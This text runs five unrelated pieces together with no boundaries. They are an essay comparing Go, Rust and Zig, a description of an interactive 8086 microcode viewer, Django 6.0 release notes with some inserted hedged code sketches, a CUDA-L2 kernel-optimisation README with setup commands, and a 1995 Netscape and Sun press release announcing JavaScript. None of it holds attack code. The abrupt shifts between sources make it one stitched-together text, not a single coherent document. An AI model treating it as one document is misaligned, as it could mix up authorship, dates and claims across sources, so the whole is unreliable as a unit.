I’ve collected here my impressions of the three languages I’ve experimented with lately: Go, Rust, and Zig. I’ve tried to synthesize my experience with each language into a sweeping verdict on what that language values and how well it executes on those values. This might be reductive, but, like, crystallizing a set of reductive prejudices is sort of what I’m trying to do here.
Go is distinguished by its minimalism. It has been described as “a modern C.” Go isn’t like C, because it is garbage-collected and has a real run-time, but it is like C in that you can fit the whole language in your head.
You can fit the whole language in your head because Go has so few features. For a long time, Go was notorious for not having generics. That was finally changed in Go 1.18, but that was only after 12 years of people begging for generics to be added to the language. Other features common in modern languages, like tagged unions or syntactic sugar for error-handling, have not been added to Go.
It seems the Go development team has a high bar for adding features to the language. The end result is a language that forces you to write a lot of boilerplate code to implement logic that could be more succinctly expressed in another language. But the result is also a language that is stable over time and easy to read.
To give you another example of Go’s minimalism, consider Go’s slice type. Both Rust and Zig have a slice type, but these are fat pointers and fat pointers only. In Go, a slice is a fat pointer to a contiguous sequence in memory, but a slice can also grow, meaning that it subsumes the functionality of Rust’s Vec<T> type and Zig’s ArrayList. Also, since Go is managing your memory for you, Go will decide whether your slice’s backing memory lives on the stack or the heap; in Rust or Zig, you have to think much harder about where your memory lives.
Go’s origin myth, as I understand it, is basically this: Rob Pike was sick of waiting for C++ projects to compile and was sick of other programmers at Google making mistakes in those same C++ projects. Go is therefore simple where C++ is baroque. It is a language for the programming rank and file, designed to be sufficient for 90% of use cases while also being easy to understand, even (perhaps especially) when writing concurrent code.
I don’t use Go at work, but I think I should. Go is minimal in service of corporate collaboration. I don’t mean that as a slight—building software in a corporate environment has its own challenges, which Go solves for.
Where Go is minimalist, Rust is maximalist. A tagline often associated with Rust is “zero-cost abstractions.” I would amend that to read, “zero-cost abstractions, and lots of them!”
Rust has a reputation for being hard to learn. I agree with Jamie Brandon, who writes that it’s not lifetimes that make Rust difficult, it’s the number of concepts stuffed into the language. I’m not the first person to pick on this particular Github comment, but it perfectly illustrates the conceptual density of Rust:
The type Pin<&LocalType> implements Deref<Target = LocalType> but it doesn’t implement DerefMut. The types Pin and & are #[fundamental] so that an impl DerefMut for Pin<&LocalType> is possible. You can use LocalType == SomeLocalStruct or LocalType == dyn LocalTrait and you can coerce Pin<Pin<&SomeLocalStruct>> into Pin<Pin<&dyn LocalTrait>>. (Indeed, two layers of Pin!!) This allows creating a pair of “smart pointers that implement CoerceUnsized but have strange behavior” on stable (Pin<&SomeLocalStruct> and Pin<&dyn LocalTrait> become the smart pointers with “strange behavior” and they already implement CoerceUnsized).
Of course, Rust isn’t trying to be maximalist the same way Go is trying to be minimalist. Rust is a complex language because what it’s trying to do is deliver on two goals—safety and performance—that are somewhat in tension.
The performance goal is self-explanatory. What “safety” means is less clear; at least it was to me, though maybe I’ve just been Python-brained for too long. “Safety” means “memory safety,” the idea that you shouldn’t be able to dereference an invalid pointer, or do a double-free, etc. But it also means more than that. A “safe” program avoids all undefined behavior (sometimes referred to as “UB”).
What is the dreaded UB? I think the best way to understand it is to remember that, for any running program, there are FATES WORSE THAN DEATH. If something goes wrong in your program, immediate termination is great actually! Because the alternative, if the error isn’t caught, is that your program crosses over into a twilight zone of unpredictability, where its behavior might be determined by which thread wins the next data race or by what garbage happens to be at a particular memory address. Now you have heisenbugs and security vulnerabilities. Very bad.
Rust tries to prevent UB without paying any run-time performance penalty by checking for it at compile-time. The Rust compiler is smart, but it’s not omniscient. For it to be able to check your code, it has to understand what your code will do at run-time. And so Rust has an expressive type system and a menagerie of traits that allow you to express, to the compiler, what in another language would just be the apparent run-time behavior of your code.
This makes Rust hard, because you can’t just do the thing! You have to find out Rust’s name for the thing—find the trait or whatever you need—then implement it as Rust expects you to. But if you do this, Rust can make guarantees about the behavior of your code that other languages cannot, which depending on your application might be crucial. It can also make guarantees about other people’s code, which makes consuming libraries easy in Rust and explains why Rust projects have almost as many dependencies as projects in the JavaScript ecosystem.
Of the three languages, Zig is the newest and least mature. As of this writing, Zig is only on version 0.14. Its standard library has almost zero documentation and the best way to learn how to use it is to consult the source code directly.
Although I don’t know if this is true, I like to think of Zig as a reaction to both Go and Rust. Go is simple because it obscures details about how the computer actually works. Rust is safe because it forces you to jump through its many hoops. Zig will set you free! In Zig, you control the universe and nobody can tell you what to do.
In both Go and Rust, allocating an object on the heap is as easy as returning a pointer to a struct from a function. The allocation is implicit. In Zig, you allocate every byte yourself, explicitly. (Zig has manual memory management.) You have more control here than you have even in C: to allocate bytes, you have to call alloc() on a specific kind of allocator, meaning you have to decide on the best allocator implementation for your use case.
In Rust, creating a mutable global variable is so hard that there are long forum discussions on how to do it. In Zig, you can just create one, no problem.
Undefined behavior is still important in Zig. Zig calls it “illegal behavior.” It tries to detect it at run-time and crash the program when it occurs. For those who might worry about the performance cost of these checks, Zig offers four different “release modes” that you can choose from when you build your program. In some of these, the checks are disabled. The idea seems to be that you can run your program enough times in the checked release modes to have reasonable confidence that there will be no illegal behavior in the unchecked build of your program. That seems like a highly pragmatic design to me.
Another difference between Zig and the other two languages is Zig’s relationship to object-oriented programming. OOP has been out of favor for a while now and both Go and Rust eschew class inheritance. But Go and Rust have enough support for other object-oriented programming idioms that you could still construct your program as a graph of interacting objects if you wanted to. Zig has methods, but no private struct fields and no language feature implementing run-time polymorphism (AKA dynamic dispatch), even though std.mem.Allocator is dying to be an interface. As best as I can tell, these exclusions are intentional; Zig is a language for data-oriented design.
One more thing I want to say about this, because I found it eye-opening: it might seem crazy to be building a programming language with manual memory management in 2025, especially when Rust has shown that you don’t even need garbage collection and can let the compiler do it for you. But this is a design choice very much related to the choice to exclude OOP features. In Go and Rust and so many other languages, you tend to allocate little bits of memory at a time for each object in your object graph. Your program has thousands of little hidden malloc()s and free()s, and therefore thousands of different lifetimes. This is RAII. In Zig, it might seem like manual memory management would require lots of tedious, error-prone bookkeeping, but that’s only if you insist on tying memory allocations to all your little objects. You could instead just allocate and free big chunks of memory at certain sensible points in your program (like at the start of each iteration of your event loop), and use that memory to hold the data you need to operate on. It’s this approach that Zig encourages.
Many people seem confused about why Zig should exist if Rust does already. It’s not just that Zig is trying to be simpler. I think this difference is the more important one. Zig wants you to excise even more object-oriented thinking from your code.
Zig has a fun, subversive feel to it. It’s a language for smashing the corporate class hierarchy (of objects). It’s a language for megalomaniacs and anarchists. I like it. I hope it gets to a stable release soon, though the Zig team’s current priority seems to be rewriting all of their dependencies. It’s not impossible they try to rewrite the Linux kernel before we see Zig 1.0.
Browse all 512 micro-instructions. Hover the Binary, Move, and Action columns for decoded details and color-coded bit fields.
Source: Andrew Jenner’s 8086 microcode disassembly, based on Ken Shirriff's die photo.
Author: @nand2mario — December 2025
The Intel 8086 executes its machine instructions through microcode. This viewer presents an interactive listing of all 512 micro-instructions in the control ROM. Each micro-instruction is 21 bits wide, addressed by a 13-bit micro-address, and split into two parts: a Move field, which moves data between internal registers, and an Action field, which controls ALU operations, memory cycles, branching, and other control signals.
The microcode address is composed of two fields: the upper 9 bits AR and the lower 4 bits CR. In the viewer, the opcode/address field is shown as AR.CR[3:2] (binary). When the opcode is empty, the next micro-instruction follows sequentially. For short jumps (type 0 actions), AR remains unchanged and a 4-bit target is loaded into CR; hovering the short-jump value highlights the target row. For long jumps (types 5 and 7), a separate Translation ROM maps a 4-bit destination code to a full 13-bit address, and both AR and CR are replaced with this translated value.
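To make the field split concrete, here is a minimal Python sketch based only on what the paragraph above states: the upper 9 bits form AR, the lower 4 bits form CR, and a short jump replaces CR while keeping AR. The long-jump Translation ROM lookup is omitted.
def split_micro_address(addr: int) -> tuple[int, int]:
    # A microcode address is 13 bits: AR is the upper 9 bits, CR the lower 4 bits.
    assert 0 <= addr < (1 << 13), "micro-addresses are 13 bits wide"
    ar = addr >> 4
    cr = addr & 0b1111
    return ar, cr

def short_jump(addr: int, target: int) -> int:
    # Type 0 action: AR is kept, and a 4-bit target is loaded into CR.
    ar, _ = split_micro_address(addr)
    return (ar << 4) | (target & 0b1111)

if __name__ == "__main__":
    addr = 0b1_0110_1010_0101
    ar, cr = split_micro_address(addr)
    print(f"AR={ar:09b} CR={cr:04b}")
    print(f"after a short jump to 0b0011: {short_jump(addr, 0b0011):013b}")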
December 3, 2025
Welcome to Django 6.0!
These release notes cover the new features, as well as some backwards incompatible changes you should be aware of when upgrading from Django 5.2 or earlier. We’ve begun the deprecation process for some features.
See the How to upgrade Django to a newer version guide if you’re updating an existing project.
Django 6.0 supports Python 3.12, 3.13, and 3.14. We highly recommend, and only officially support, the latest release of each series.
The Django 5.2.x series is the last to support Python 3.10 and 3.11.
Following the release of Django 6.0, we suggest that third-party app authors drop support for all versions of Django prior to 5.2. At that time, you should be able to run your package’s tests using python -Wd so that deprecation warnings appear. After making the deprecation warning fixes, your app should be compatible with Django 6.0.
Built-in support for the Content Security Policy (CSP) standard is now available, making it easier to protect web applications against content injection attacks such as cross-site scripting (XSS). CSP allows declaring trusted sources of content by giving browsers strict rules about which scripts, styles, images, or other resources can be loaded.
CSP policies can now be enforced or monitored directly using built-in tools:
headers are added via the ContentSecurityPolicyMiddleware, nonces are supported through the csp() context processor, and policies are configured using the SECURE_CSP and SECURE_CSP_REPORT_ONLY settings.
These settings accept Python dictionaries and support Django-provided constants for clarity and safety. For example:
from django.utils.csp import CSP

SECURE_CSP = {
    "default-src": [CSP.SELF],
    "script-src": [CSP.SELF, CSP.NONCE],
    "img-src": [CSP.SELF, "https:"],
}
The resulting Content-Security-Policy header would be set to:
default-src 'self'; script-src 'self' 'nonce-SECRET'; img-src 'self' https:
To get started, follow the CSP how-to guide. For in-depth guidance, see the CSP security overview and the reference docs, which include details about decorators to override or disable policies on a per-view basis.
The Django Template Language now supports template partials, making it easier to encapsulate and reuse small named fragments within a template file. The new tags {% partialdef %} and {% partial %} define a partial and render it, respectively.
Partials can also be referenced using the template_name#partial_name syntax with get_template(), render(), {% include %}, and other template-loading tools, enabling more modular and maintainable templates without needing to split components into separate files.
A migration guide is available if you’re updating from the django-template-partials third-party package.
Django now includes a built-in Tasks framework for running code outside the HTTP request–response cycle. This enables offloading work, such as sending emails or processing data, to background workers.
The framework provides task definition, validation, queuing, and result handling. Django guarantees consistent behavior for creating and managing tasks, while the responsibility for running them continues to belong to external worker processes.
Tasks are defined using the task() decorator:
from django.core.mail import send_mail
from django.tasks import task

@task
def email_users(emails, subject, message):
    return send_mail(subject, message, None, emails)
Once defined, tasks can be enqueued through a configured backend:
email_users.enqueue(
    emails=["user@example.com"],
    subject="You have a message",
    message="Hello there!",
)
Backends are configured via the TASKS setting. The two built-in backends included in this release are primarily intended for development and testing.
Django handles task creation and queuing, but does not provide a worker mechanism to run tasks. Execution must be managed by external infrastructure, such as a separate process or service.
See Django’s Tasks framework for an overview and the Tasks reference for API details.
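As a rough sketch of what configuring a backend might look like, the settings fragment below assumes the TASKS setting follows the alias-to-options shape used by CACHES and DATABASES and that the development-oriented immediate backend lives at the dotted path shown; both details are assumptions, so check the Tasks reference for the exact names.
# settings.py fragment; the backend path and setting shape here are assumptions,
# not copied from the reference documentation.
TASKS = {
    "default": {
        "BACKEND": "django.tasks.backends.immediate.ImmediateBackend",
    }
}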
Email handling in Django now uses Python’s modern email API, introduced in Python 3.6. This API, centered around the email.message.EmailMessage class, offers a cleaner and Unicode-friendly interface for composing and sending emails. It replaces use of Python’s older legacy (Compat32) API, which relied on lower-level MIME classes (from email.mime) and required more manual handling of message structure and encoding.
Notably, the return type of the EmailMessage.message() method is now an instance of Python’s email.message.EmailMessage. This supports the same API as the previous SafeMIMEText and SafeMIMEMultipart return types, but is not an instance of those now-deprecated classes.
django.contrib.admin
The Font Awesome Free icon set (version 6.7.2) is now used for the admin interface icons.
The new AdminSite.password_change_form attribute allows customizing the form used in the admin site password change view.
Message levels messages.DEBUG and messages.INFO now have distinct icons and CSS styling. Previously, both levels shared the same appearance as messages.SUCCESS. Given that ModelAdmin.message_user() uses messages.INFO by default, set the level to messages.SUCCESS to keep the previous icon and styling.
django.contrib.auth
The default iteration count for the PBKDF2 password hasher is increased from 1,000,000 to 1,200,000.
django.contrib.gis
The new GEOSGeometry.hasm property checks whether the geometry has the M dimension.
The new Rotate database function rotates a geometry by a specified angle around the origin or a specified point.
The new BaseGeometryWidget.base_layer attribute allows specifying a JavaScript map base layer, enabling customization of map tile providers.
coveredby and isvalid lookups, Collect aggregation, and GeoHash and IsValid database functions are now supported on MariaDB 12.0.1+.
The new geom_type lookup and GeometryType() database function allow filtering geometries by their types.
Widgets from django.contrib.gis.forms.widgets now render without inline JavaScript in templates. If you have customized any geometry widgets or their templates, you may need to update them to match the new layout.
django.contrib.postgres
The new Lexeme expression for full text search provides fine-grained control over search terms. Lexeme objects automatically escape their input and support logical combination operators (&, |, ~), prefix matching, and term weighting.
Model fields, indexes, and constraints from django.contrib.postgres now include system checks to verify that django.contrib.postgres is an installed app.
The CreateExtension, BloomExtension, BtreeGinExtension, BtreeGistExtension, CITextExtension, CryptoExtension, HStoreExtension, TrigramExtension, and UnaccentExtension operations now support the optional hints parameter. This allows providing database hints to database routers to assist them in making routing decisions.
django.contrib.staticfiles
ManifestStaticFilesStorage now ensures consistent path ordering in manifest files, making them more reproducible and reducing unnecessary diffs.
The collectstatic command now reports only a summary for skipped files (and for deleted files when using --clear) at --verbosity 1. To see per-file details for either case, set --verbosity to 2 or higher.
The new policy argument for EmailMessage.message() allows specifying the email policy, the set of rules for updating and serializing the representation of the message. Defaults to email.policy.default.
EmailMessage.attach() now accepts a MIMEPart object from Python’s modern email API.
Added support and translations for the Haitian Creole language.
The startproject and startapp commands now create the custom target directory if it doesn’t exist.
Common utilities, such as django.conf.settings, are now automatically imported to the shell by default.
Squashed migrations can now themselves be squashed before being transitioned to normal migrations.
Migrations now support serialization of zoneinfo.ZoneInfo instances.
Serialization of deconstructible objects now supports keyword arguments with names that are not valid Python identifiers.
Constraints now implement a check() method that is already registered with the check framework.
The new order_by argument for Aggregate allows specifying the ordering of the elements in the result.
The new Aggregate.allow_order_by class attribute determines whether the aggregate function allows passing an order_by keyword argument.
The new StringAgg aggregate returns the input values concatenated into a string, separated by the delimiter string. This aggregate was previously supported only for PostgreSQL; see the sketch below for a hedged usage example.
The save() method now raises a specialized Model.NotUpdated exception when a forced update results in no affected rows, instead of a generic django.db.DatabaseError.
QuerySet.raw() now supports models with a CompositePrimaryKey.
Subqueries returning a CompositePrimaryKey can now be used as the target of lookups other than __in, such as __exact.
JSONField now supports negative array indexing on SQLite.
The new AnyValue aggregate returns an arbitrary value from the non-null input values. This is supported on SQLite, MySQL, Oracle, and PostgreSQL 16+.
GeneratedFields and fields assigned expressions are now refreshed from the database after save() on backends that support the RETURNING clause (SQLite, PostgreSQL, and Oracle). On backends that don’t support it (MySQL and MariaDB), the fields are marked as deferred to trigger a refresh on subsequent accesses.
Using a ForeignObject with multiple from_fields in Model indexes, constraints, or unique_together now emits a system check error.
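As a hedged illustration of the new StringAgg aggregate and the order_by argument mentioned above, the sketch below assumes an Author model with a name field and that the generally available aggregate can be imported from django.db.models; check the aggregation reference for the exact import path and argument names before relying on it.
from django.db.models import StringAgg  # assumed import location in Django 6.0

from myapp.models import Author  # hypothetical model with a CharField "name"

summary = Author.objects.aggregate(
    all_names=StringAgg("name", delimiter=", ", order_by="name"),
)
# summary["all_names"] might look like "Ada, Grace, Margaret"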
The new AsyncPaginator and AsyncPage provide async implementations of Paginator and Page respectively.
Multiple Cookie headers are now supported for HTTP/2 requests when running with ASGI.
The new variable forloop.length is now available within a for loop.
The querystring template tag now consistently prefixes the returned query string with a ?, ensuring reliable link generation behavior.
The querystring template tag now accepts multiple positional arguments, which must be mappings, such as QueryDict or dict.
The DiscoverRunner now supports parallel test execution on systems using the forkserver multiprocessing start method.
This section describes changes that may be needed in third-party database backends.
BaseDatabaseSchemaEditor and PostgreSQL backends no longer use CASCADE when dropping a column.
DatabaseOperations.return_insert_columns() and DatabaseOperations.fetch_returned_insert_rows() methods are renamed to returning_columns() and fetch_returned_rows(), respectively, to denote they can be used in the context of UPDATE … RETURNING statements as well as INSERT … RETURNING.
The DatabaseOperations.fetch_returned_insert_columns() method is removed and the fetch_returned_rows() method replacing fetch_returned_insert_rows() expects both a cursor and returning_params to be provided, just like fetch_returned_insert_columns() did.
If the database supports UPDATE … RETURNING statements, backends can set DatabaseFeatures.can_return_rows_from_update=True.
Upstream support for MariaDB 10.5 ends in June 2025. Django 6.0 supports MariaDB 10.6 and higher.
Because Python 3.12 is now the minimum supported version for Django, any optional dependencies must also meet that requirement. The following versions of each library are the first to add or confirm compatibility with Python 3.12:
aiosmtpd 1.4.5
argon2-cffi 23.1.0
bcrypt 4.1.1
docutils 0.22
geoip2 4.8.0
Pillow 10.1.0
mysqlclient 2.2.1
numpy 1.26.0
PyYAML 6.0.2
psycopg 3.1.12
psycopg2 2.9.9
redis-py 5.1.0
selenium 4.23.0
sqlparse 0.5.0
tblib 3.0.0
The undocumented mixed_subtype and alternative_subtype properties of EmailMessage and EmailMultiAlternatives are no longer supported.
The undocumented encoding property of EmailMessage no longer supports Python legacy email.charset.Charset objects.
As the internal implementations of EmailMessage and EmailMultiAlternatives have changed significantly, closely examine any custom subclasses that rely on overriding undocumented, internal underscore methods.
DEFAULT_AUTO_FIELD setting now defaults to BigAutoField
Since Django 3.2, when the DEFAULT_AUTO_FIELD setting was added, the default startproject template’s settings.py contained:
DEFAULT_AUTO_FIELD = "django.db.models.BigAutoField"
and the default startapp template’s AppConfig contained:
default_auto_field = "django.db.models.BigAutoField"
At that time, the default value of DEFAULT_AUTO_FIELD remained django.db.models.AutoField for backwards compatibility.
In Django 6.0, DEFAULT_AUTO_FIELD now defaults to django.db.models.BigAutoField and the aforementioned lines in the project and app templates are removed.
Most projects shouldn’t be affected, since Django 3.2 has raised the system check warning models.W042 for projects that don’t set DEFAULT_AUTO_FIELD.
If you haven’t dealt with this warning by now, add DEFAULT_AUTO_FIELD = 'django.db.models.AutoField' to your project’s settings, or default_auto_field = 'django.db.models.AutoField' to an app’s AppConfig, as needed.
Prior to Django 6.0, custom lookups and custom expressions implementing the as_sql() method (and its supporting methods process_lhs() and process_rhs()) were allowed to return a sequence of params in either a list or a tuple. To address the interoperability problems that resulted, the second return element of the as_sql() method should now be a tuple:
def as_sql(self, compiler, connection) -> tuple[str, tuple]: ...
If your custom expressions support multiple versions of Django, you should adjust any pre-processing of parameters to be resilient against either tuples or lists. For instance, prefer unpacking like this:
params = (*lhs_params, *rhs_params)
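As one hedged illustration of the new contract, a custom lookup might build its parameters as a tuple like this; the lookup itself is illustrative and its registration on a field class is omitted.
from django.db.models import Lookup

class NotEqual(Lookup):
    # Illustrative custom lookup; register it with a field class before use.
    lookup_name = "ne"

    def as_sql(self, compiler, connection):
        lhs, lhs_params = self.process_lhs(compiler, connection)
        rhs, rhs_params = self.process_rhs(compiler, connection)
        params = (*lhs_params, *rhs_params)  # a tuple, per the Django 6.0 contract
        return f"{lhs} <> {rhs}", params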
The JSON serializer now writes a newline at the end of the output, even without the indent option set.
The minimum supported version of asgiref is increased from 3.8.1 to 3.9.1.
django.core.mail APIs
django.core.mail APIs now require keyword arguments for less commonly used parameters. Using positional arguments for these now emits a deprecation warning and will raise a TypeError when the deprecation period ends:
All optional parameters (fail_silently and later) must be passed as keyword arguments to get_connection(), mail_admins(), mail_managers(), send_mail(), and send_mass_mail().
All parameters must be passed as keyword arguments when creating an EmailMessage or EmailMultiAlternatives instance, except for the first four (subject, body, from_email, and to), which may still be passed either as positional or keyword arguments.
BaseDatabaseCreation.create_test_db(serialize) is deprecated. Use serialize_db_to_string() instead.
The PostgreSQL StringAgg class is deprecated in favor of the generally available StringAgg class.
The PostgreSQL OrderableAggMixin is deprecated in favor of the order_by attribute now available on the Aggregate class.
The default protocol in urlize and urlizetrunc will change from HTTP to HTTPS in Django 7.0. Set the transitional setting URLIZE_ASSUME_HTTPS to True to opt into assuming HTTPS during the Django 6.x release cycle.
The URLIZE_ASSUME_HTTPS transitional setting is deprecated.
Setting ADMINS or MANAGERS to a list of (name, address) tuples is deprecated. Set to a list of email address strings instead. Django never used the name portion. To include a name, format the address string as '"Name" <address>' or use Python’s email.utils.formataddr().
Support for the orphans argument being larger than or equal to the per_page argument of django.core.paginator.Paginator and django.core.paginator.AsyncPaginator is deprecated.
Using a percent sign in a column alias or annotation is deprecated.
Support for passing Python’s legacy email MIMEBase object to EmailMessage.attach() (or including one in the message’s attachments list) is deprecated. For complex attachments requiring additional headers or parameters, switch to the modern email API’s MIMEPart.
The django.core.mail.BadHeaderError exception is deprecated. Python’s modern email raises a ValueError for email headers containing prohibited characters.
The django.core.mail.SafeMIMEText and SafeMIMEMultipart classes are deprecated.
The undocumented django.core.mail.forbid_multi_line_headers() and django.core.mail.message.sanitize_address() functions are deprecated.
These features have reached the end of their deprecation cycle and are removed in Django 6.0.
See Features deprecated in 5.0 for details on these changes, including how to remove usage of these features.
Support for passing positional arguments to BaseConstraint is removed.
The DjangoDivFormRenderer and Jinja2DivFormRenderer transitional form renderers are removed.
BaseDatabaseOperations.field_cast_sql() is removed.
request is required in the signature of ModelAdmin.lookup_allowed() subclasses.
Support for calling format_html() without passing args or kwargs is removed.
The default scheme for forms.URLField has changed from "http" to "https".
The FORMS_URLFIELD_ASSUME_HTTPS transitional setting is removed.
The django.db.models.sql.datastructures.Join no longer falls back to get_joining_columns().
The get_joining_columns() method of ForeignObject and ForeignObjectRel is removed.
The ForeignObject.get_reverse_joining_columns() method is removed.
Support for cx_Oracle is removed.
The ChoicesMeta alias to django.db.models.enums.ChoicesType is removed.
The Prefetch.get_current_queryset() method is removed.
The get_prefetch_queryset() method of related managers and descriptors is removed.
get_prefetcher() and prefetch_related_objects() no longer fall back to get_prefetch_queryset().
See Features deprecated in 5.1 for details on these changes, including how to remove usage of these features.
django.urls.register_converter() no longer allows overriding existing converters.
The ModelAdmin.log_deletion() and LogEntryManager.log_action() methods are removed.
The undocumented django.utils.itercompat.is_iterable() function and the django.utils.itercompat module are removed.
The django.contrib.gis.geoip2.GeoIP2.coords() method is removed.
The django.contrib.gis.geoip2.GeoIP2.open() method is removed.
Support for passing positional arguments to Model.save() and Model.asave() is removed.
The setter for django.contrib.gis.gdal.OGRGeometry.coord_dim is removed.
The check keyword argument of CheckConstraint is removed.
The get_cache_name() method of FieldCacheMixin is removed.
The OS_OPEN_FLAGS attribute of FileSystemStorage is removed.
CUDA-L2 is a system that combines large language models (LLMs) and reinforcement learning (RL) to automatically optimize Half-precision General Matrix Multiply (HGEMM) CUDA kernels. CUDA-L2 systematically outperforms major matmul baselines to date, from the widely-used torch.matmul to state-of-the-art NVIDIA closed-source libraries (cuBLAS, cuBLASLt-heuristic, cuBLASLt-AutoTuning). Paper
Speedup of CUDA-L2 over torch.matmul, cuBLAS, cuBLASLt-heuristic, and cuBLASLt-AutoTuning across 1000 (M,N,K) configurations on A100.
Speedup comparison results across 1000 (M,N,K) configurations on A100.
Q: Do A100 kernels apply to other machines like RTX 3090 or H100?
A: Ideally, kernels trained on A100 should only be used on A100 if you are targeting speedup. They might have speedup on other machines, but it's not guaranteed. We will progressively release kernels trained on different machines.
Q: What if I need matrix dimensions (M, N, K) not found in your configurations?
A: 1. You can find the nearest neighbor configuration (larger than yours) and pad with zeros. 2. Feel free to post your dimensions on GitHub issues. We are happy to release kernels for your configuration.
This project depends on NVIDIA CUTLASS. You must clone the specific tag v4.2.1 into a directory named cutlass:
git clone -b v4.2.1 https://github.com/NVIDIA/cutlass.git cutlass
⚠️ Warning: Please ensure you download the correct CUTLASS version (v4.2.1) and set the CUTLASS_DIR environment variable correctly. Incorrect CUTLASS setup may cause the project to fail silently or produce no results.
Before building or running the project, you must configure the following environment variables:
CUTLASS_DIR: Points to the directory where you cloned CUTLASS.
TORCH_CUDA_ARCH_LIST: Specifies the target GPU architecture (e.g., "8.0" for NVIDIA Ampere / A100 / RTX 30 series).
Run the following commands:
export CUTLASS_DIR=/path/to/your/cutlass
export TORCH_CUDA_ARCH_LIST="8.0"
To run the evaluation, use the eval_one_file.sh script. Below is an example command for offline mode:
./eval_one_file.sh --mnk 64_4096_64 --warmup_seconds 5 --benchmark_seconds 10 --base_dir ./results --gpu_device_id 7 --mode offline
For server mode, you need to specify --target_qps:
./eval_one_file.sh --mnk 64_4096_64 --warmup_seconds 5 --benchmark_seconds 10 --base_dir ./results --gpu_device_id 7 --mode server --target_qps 100
| Argument | Description |
|---|---|
| --mnk | Specifies the problem size (e.g., 64_4096_64). |
| --warmup_seconds | Duration of warmup in seconds before timing. |
| --benchmark_seconds | Duration of benchmarking in seconds. |
| --base_dir | Directory to save the compile and output results. |
| --gpu_device_id | The ID of the GPU to use (e.g., 7). |
| --mode | Execution mode. Options are: offline (runs the evaluation in offline/batch processing mode) or server (runs the evaluation in server mode, simulating request-based scenarios). |
| --target_qps | Target Queries Per Second (QPS) for server mode. Required if mode is server. |
If you have any questions, please open a GitHub issue or reach out to us at jiwei_li@deep-reinforce.com .
MOUNTAIN VIEW, Calif. (December 4, 1995) -- Netscape Communications Corporation (NASDAQ: NSCP) and Sun Microsystems, Inc. (NASDAQ:SUNW), today announced JavaScript, an open, cross-platform object scripting language for the creation and customization of applications on enterprise networks and the Internet. The JavaScript language complements Java, Sun's industry-leading object-oriented, cross-platform programming language. The initial version of JavaScript is available now as part of the beta version of Netscape Navigator 2.0, which is currently available for downloading from Netscape's web site.
In addition, 28 industry-leading companies, including America Online, Inc., Apple Computer, Inc., Architext Software, Attachmate Corporation, AT&T, Borland International, Brio Technology, Inc., Computer Associates, Inc., Digital Equipment Corporation, Hewlett-Packard Company, Iconovex Corporation, Illustra Information Technologies, Inc., Informix Software, Inc., Intuit, Inc., Macromedia, Metrowerks, Inc., Novell, Inc., Oracle Corporation, Paper Software, Inc., Precept Software, Inc., RAD Technologies, Inc., The Santa Cruz Operation, Inc., Silicon Graphics, Inc., Spider Technologies, Sybase, Inc., Toshiba Corporation, Verity, Inc., and Vermeer Technologies, Inc., have endorsed JavaScript as an open standard object scripting language and intend to provide it in future products. The draft specification of JavaScript, as well as the final draft specification of Java, is planned for publishing and submission to appropriate standards bodies for industry review and comment this month.
JavaScript is an easy-to-use object scripting language designed for creating live online applications that link together objects and resources on both clients and servers. While Java is used by programmers to create new objects and applets, JavaScript is designed for use by HTML page authors and enterprise application developers to dynamically script the behavior of objects running on either the client or the server. JavaScript is analogous to Visual Basic in that it can be used by people with little or no programming experience to quickly construct complex applications. JavaScript's design represents the next generation of software designed specifically for the Internet and is:
With JavaScript, an HTML page might contain an intelligent form that performs loan payment or currency exchange calculations right on the client in response to user input. A multimedia weather forecast applet written in Java can be scripted by JavaScript to display appropriate images and sounds based on the current weather readings in a region. A server-side JavaScript script might pull data out of a relational database and format it in HTML on the fly. A page might contain JavaScript scripts that run on both the client and the server. On the server, the scripts might dynamically compose and format HTML content based on user preferences stored in a relational database, and on the client, the scripts would glue together an assortment of Java applets and HTML form elements into a live interactive user interface for specifying a net-wide search for information.
Java programs and JavaScript scripts are designed to run on both clients and servers, with JavaScript scripts used to modify the properties and behavior of Java objects, so the range of live online applications that dynamically present information to and interact with users over enterprise networks or the Internet is virtually unlimited. Netscape will support Java and JavaScript in client and server products as well as programming tools and applications to make this vision a reality.
"Programmers have been overwhelmingly enthusiastic about Java because it was designed from the ground up for the Internet. JavaScript is a natural fit, since it's also designed for the Internet and Unicode-based worldwide use," said Bill Joy, co-founder and vice president of research at Sun. "JavaScript will be the most effective method to connect HTML-based content to Java applets."
Netscape's authoring and application development tools -- Netscape Navigator Gold 2.0, Netscape LiveWire and Netscape LiveWire Pro -- are designed for rapid development and deployment of JavaScript applications. Netscape Navigator Gold 2.0 enables developers to create and edit JavaScript scripts, while Netscape LiveWire enables JavaScript programs to be installed, run and managed on Netscape servers, both within the enterprise and across the Internet. Netscape LiveWire Pro adds support for JavaScript connectivity to high-performance relational databases from Illustra, Informix, Microsoft, Oracle and Sybase. Java and JavaScript support are being built into all Netscape products to provide a unified, front-to-back, client/server/tool environment for building and deploying live online applications.
Java is available to developers free of charge. The Java Compiler and Java Developer's Kit as well as the HotJava browser and related documentation are available from Sun's web site at http://java.sun.com. In addition, the Java source code can be licensed for a fee. Details on licensing are also available via the java.sun.com web page. To date, Sun has licensed Java to a number of leading technology companies, including Borland, Macromedia, Mitsubishi, Netscape, Oracle, Silicon Graphics, Spyglass, and Toshiba. Sun's Workshop for Java toolkit is scheduled for release in Spring 1996. Sun's NEO product family, the first complete development, operating and management environment for object-oriented networked applications, will also use Java-enabled browsers as front-ends to the NEO environment.
Netscape and Sun plan to propose JavaScript to the W3 Consortium (W3C) and the Internet Engineering Task Force (IETF) as an open Internet scripting language standard. JavaScript will be an open, freely licensed proposed standard available to the entire Internet community. Existing Sun Java licensees will receive a license to JavaScript. In addition, Sun and Netscape intend to make a source code reference implementation of JavaScript available for royalty-free licensing, further encouraging its adoption as a standard in a wide variety of products.
Netscape Communications Corporation is a premier provider of open software for linking people and information over enterprise networks and the Internet. The company offers a full line of Netscape Navigator clients, Netscape servers, development tools and Netscape Internet Applications to create a complete platform for next-generation, live online applications. Traded on Nasdaq under the symbol "NSCP", Netscape Communications Corporation is based in Mountain View, California.
With annual revenues of $6 billion, Sun Microsystems, Inc. provides solutions that enable customers to build and maintain open network computing environments. Widely recognized as a proponent of open standards, the company is involved in the design, manufacture and sale of products, technologies and services for commercial and technical computing. Sun's SPARC(TM) workstations, multiprocessing servers, SPARC microprocessors, Solaris operating software and ISO-certified service organization each rank No. 1 in the UNIX(R) industry. Founded in 1982, Sun is headquartered in Mountain View, Calif., and employs more than 14,000 people worldwide.
Additional information on Netscape Communications Corporation is available on the Internet, by sending email to info@netscape.com or by calling 415-528-2555. Additional information on Sun Microsystems is available on the Internet at http://www.sun.com or, for Java information, at http://java.sun.com.
